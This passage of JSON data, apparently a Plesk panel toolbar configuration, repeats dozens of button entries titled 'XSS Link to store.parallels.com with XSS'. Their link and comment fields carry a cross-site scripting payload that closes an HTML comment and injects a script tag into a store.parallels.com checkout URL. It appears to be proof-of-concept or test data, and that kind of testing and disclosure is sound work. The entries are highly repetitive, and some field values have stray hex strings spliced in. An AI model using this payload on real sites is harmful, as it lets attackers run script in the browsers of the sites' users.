XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"fdf080d9bd966e1de55578fb","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1fdf080d9b2b0696f832ad89","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"fdf080d92d642275e0dcc88a","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1fdf080d9f5a4b605e4d1d3e","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 